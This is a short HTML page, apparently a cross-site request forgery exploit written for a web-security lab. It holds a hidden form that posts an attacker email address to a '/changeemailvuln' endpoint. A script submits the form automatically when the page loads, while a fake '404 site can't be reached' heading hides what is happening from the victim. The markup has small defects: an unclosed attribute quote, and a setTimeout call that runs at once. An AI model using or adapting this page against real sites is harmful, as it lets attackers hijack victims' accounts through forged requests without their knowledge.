<html>
    <body>
        <form action="https://web2-lab2.onrender.com/changeemailvuln method="POST">
            <input type="hidden" name="email" id="email" value="youhavebeenhacked@hacker.com" />            
        </form>
        <script>
            window.onload=function(){
                setTimeout(document.forms[0].submit(),5000);
            }           
        </script>
        <h1>404 site can't be reached</h1>
    </body>
</html>